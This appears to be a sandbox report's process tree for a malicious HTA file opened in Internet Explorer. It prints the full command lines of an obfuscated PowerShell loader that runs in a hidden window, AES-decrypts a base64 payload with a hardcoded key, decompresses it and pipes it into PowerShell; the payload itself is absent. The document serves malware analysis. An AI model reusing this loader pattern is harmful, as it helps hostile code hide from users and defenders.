
Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\htatest1.hta.html

    3068
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3068 CREDAT:145409

      1188
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = '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';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell - }

        1564
        • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $sXWykRBF = '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';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv | powershell -

          2504
          • powershell.exe powershell.exe $sXWykRBF = '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';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv

            1328
